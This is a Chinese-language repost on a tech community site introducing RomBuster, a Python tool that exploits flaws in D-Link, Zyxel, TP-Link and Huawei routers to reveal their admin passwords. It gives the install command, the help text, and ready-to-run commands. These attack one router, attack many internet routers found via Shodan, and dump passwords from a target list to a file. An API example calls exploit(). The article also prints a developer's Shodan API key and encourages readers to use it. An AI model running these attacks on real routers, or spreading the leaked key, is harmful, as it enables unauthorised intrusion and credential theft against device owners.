专栏首页黑客网络技术使用RomBuster获取网络路由器密码

使用RomBuster获取网络路由器密码

关于RomBuster

RomBuster是一款功能强大的针对网络路由器的漏洞利用工具,该工具能够帮助广大研究人员对网络路由器的安全性进行分析,并获取目标路由器的管理员密码。

功能介绍

能够利用大多数热门路由器中的安全漏洞,例如D-Link、Zyxel、TP-Link和华为等等。 经过优化处理,可从列表中读取多个目标路由器,并进行安全分析和漏洞利用。 简单的命令行接口和API用法。

工具安装

由于RomBuster使用Python3开发,因此首先需要在本地设备上安装并配置好Python3环境。接下来,广大研究人员可以使用下列命令下载并安装RomBuster:

pip3 install git+https://github.com/EntySec/RomBuster

基础使用

RomBuster的使用非常简单,我们只需要在命令行终端中输入“rombuster”命令即可使用RomBuster:

usage: rombuster [-h] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]

                 [--zoomeye ZOOMEYE] [-p PAGES]



RomBuster is a router exploitation tool that allows to disclosure network

router admin password.



optional arguments:

  -h, --help            显示这个帮助信息并退出

  -o OUTPUT, --output OUTPUT

                        将结果存储至文件

  -i INPUT, --input INPUT

                        地址列表输入文件

  -a ADDRESS, --address ADDRESS

                        提供单个地址

  --shodan SHODAN       通过网络利用远程设备所使用的Shodan API密钥

  --zoomeye ZOOMEYE     通过网络利用远程设备所使用的ZoomEye API密钥

  -p PAGES, --pages PAGES

                        需要通过ZoomEye获取的页面数量

工具使用样例

攻击单个路由器

下列命令可以攻击单个网络路由器:

rombuster -a 192.168.99.1

通过网络攻击远程路由器

接下来,我们可以使用Shodan搜索引擎来搜索并攻击网络上的路由器:

rombuster --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

注意:项目中给出的Shodan API密钥(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)是开发人员自己的专业版API密钥,你可以使用你自己的密钥,当然了你想用开发人员的也没意见,大家资源共享嘛!

从输入文件获取目标路由器

我们还可以使用开放数据库中提供的摄像头地址:

rombuster -i routers.txt -o passwords.txt

注意:此命令将会攻击routers.txt中给出的所有摄像头,并会将所有获取到的密码存储至passwords.txt文件中。

API使用

RomBuster还提供了自己的Python API,可以将其导入至你们自己的项目代码中并调用其功能:

from rombuster import RomBuster

基础函数

下面给出的是RomBuster支持的基础函数,可以用于利用指定路由器中的安全漏洞:

exploit(address):攻击指定地址的单个路由器

调用样例

攻击单个路由器:

from rombuster import RomBuster

rombuster = RomBuster()

creds = rombuster.exploit(\\\\'192.168.99.1\\\\')

print(creds

本文分享自微信公众号 - 黑客网络技术(Hacker202101)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2021-08-29

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 使用RomBuster获取网络路由器密码

    RomBuster是一款功能强大的针对网络路由器的漏洞利用工具,该工具能够帮助广大研究人员对网络路由器的安全性进行分析,并获取目标路由器的管理员密码。

    FB客服
  • RomBuster - 路由器攻击

    让我们尝试使用 Shodan 搜索引擎来利用 Internet 上的路由器,我们将使用它-t来快速利用。

    Khan安全团队
  • 利用路由器漏洞获取全网扶墙账户密码

    ZoomEye是一款针对网络空间的搜索引擎,收录了互联网空间中的设备、网站及其使用的服务或组件等信息。

    小生观察室
  • 如何在家庭网络中使用两台路由器?

    网上查到的资料,都写得太专业,对像我这样的业余人士用处不大。我反复设置各种参数,整整花了一个晚上,才算安装成功。下面就是一些设置要点,我记录下来备忘,希望对其他...

    ruanyf
  • 解密攻击者如何利用D-Link路由器构建僵尸网络

    在这篇文章中,我们将跟大家讨论我们在几台顶级D-Link路由器中发现的安全漏洞,受影响的路由器型号如下: -DIR890L -DIR885L -DIR895L...

    FB客服
  • 黑客攻破路由器瞬间盗取网银密码 TP-LINK成主要攻击对象

    近日央视曝光大量路由器存在漏洞和后门,而路由器一旦被黑客劫持,网银、QQ等账号密码都面临失窃风险。最近一周内,国内有46.8万台路由器检测出黑客劫持情况,占检测...

    安恒信息
  • 实用代码-C#获取本机网络适配器信息及MAC地址

    System.Net.NetworkInformation空间提供对网络流量数据、网络地址信息和本地计算机的地址更改通知的访问。该命名空间还包含实现 Ping ...

    blackheart
  • 给电脑插上无线网卡,变成路由器----Windows系统承载网络的使用

    参数详解: mode:是否启用虚拟wifi网卡,改为disallow则为禁用。 ssid:无线网名称,最好使用英文,因为windows字符的问题,在其他系统上可...

    xuyaowen
  • 成都电信宽带获取IPV6地址全过程

    目前部分地区已经支持IPV6地址,具体可以咨询对应网络运营商(客服可能不知道IPV6是啥)或者网上搜索。从测试来看,成都电信手机网络已经支持IPV6,成都电信宽...

    砸漏
  • 微信硬件平台智能路由行业解决方案

    路由器是提供Wi-Fi网络的重要设备,服务了亿万的家庭,但依然被认为是非常专业的设备,普通用户都不懂得如何使用。我们希望通过微信硬件平台的能力,降低用户使用路由...

    ytkah
  • Glupteba恶意软件变种分析

    最近发现了恶意软件glupteba的网络攻击行为。它是一个旧的恶意软件,曾在名为“windigo”的行动中出现过,并通过漏洞传播给windows用户。

    FB客服
  • TP-Link TL-WDR6320 无线路由器当作无线交换机使用设置教程

    将设置电脑连接到路由器的LAN口,确保电脑自动获取到IP地址和DNS服务器地址。如下:

    砸漏
  • 无线攻防:wifi攻防从破解到钓鱼

    无线安全是信息安全体系下一门很广泛的学科,包括但并不仅限于近场(NFC)、蓝牙(Bluetooth) 、射频(radio frequency,RF) 、无线局域...

    FB客服
  • Android平台渗透测试套件zANTI v2.5发布(含详细说明)

    神无月
  • 安卓手机搭建渗透环境(无需Root)

    大家熟知的渗透测试是笔记本上神秘滚动的linux命令!一台kali笔记本走天下,是渗透测试的基本素养。但笔记本还是太大,很多地方你用笔记本做渗透测试还是太招摇,...

    FB客服
  • 斐讯k2路由器怎么设置

    1、斐讯K2无线路由器上有5个网线接口:有1个WAN接口,还有LAN1、LAN2、LAN3、LAN4共4个LAN接口。WAN接口连接猫(宽带网线);电脑用网线连...

    砸漏
  • FW325R路由器上网设置方法

    ①电话线上网:用户需要准备2根网线,一根网线用来连接ADSL Modem(宽带猫)与迅捷FW325R路由器的WAN接口;另一根网线用来连接计算机与迅捷FW325...

    砸漏
  • 新手科普:浅谈家用路由器安全变迁

    路由器是家庭网络的入口,在IoT浪潮下,路由器也起到了网络守护者的角色。正因为如此,这几年针对路由器的攻击也越来越多,本文就带大家细数这些年针对路由器的攻击。 ...

    FB客服
  • 谁蹭了我的WiFi?浅谈家用无线路由器攻防

    家用无线路由器作为家庭里不可或缺的网络设备,在给普通人带来极大便利的同时,也给处于互联网时代的我们带来了很多安全隐患,本文将针对普通家用无线路由器的常见攻击过程...

    FB客服

扫码关注云+社区

领取腾讯云代金券